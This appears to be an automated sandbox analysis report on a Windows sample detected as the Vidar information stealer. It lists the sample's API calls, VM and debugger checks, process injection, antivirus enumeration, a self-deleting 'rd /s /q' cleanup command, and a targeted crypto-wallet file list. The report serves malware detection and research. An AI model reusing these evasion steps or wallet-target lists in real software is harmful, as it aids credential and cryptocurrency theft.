Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004099F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004156C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_00414F80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00409D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00415A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC122FE3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_004153C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FDA0 GetSystemInfo,wsprintfA,

0_2_0040FDA0

Source: C:\ProgramData\BFCAAEHJDB.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: main.exe, 00000017.00000002.3440076438.000001E397F57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareTZ
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BFCAAEHJDB.exe, 00000007.00000002.3447891511.0000000001198000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000002.2971561968.0000027B35867000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2915570882.000001E397F6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041D12F

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402000 VirtualProtect 00000000,00000004,00000100,?

0_2_00402000

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00417A40

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004176E0 mov eax, dword ptr fs:[00000030h]

0_2_004176E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,HeapAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,

0_2_00402000

Enables debug privileges

Source: C:\ProgramData\BFCAAEHJDB.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ECC8 SetUnhandledExceptionFilter,	0_2_0041ECC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041D12F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041CAF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C81B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C81B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C9CAC62
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF620941131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,_malloc_dbg,strlen,_malloc_dbg,_cexit,	23_2_00007FF620941131

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_0040ED80

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,		0_2_00411400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_004112F0

Contains functionality to execute programs as a different user

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

23_2_00007FFDA38CF0FE

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401000 cpuid

0_2_00401000

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_0040FC30

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0041A440

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_0040FAE0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_0040FBC0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
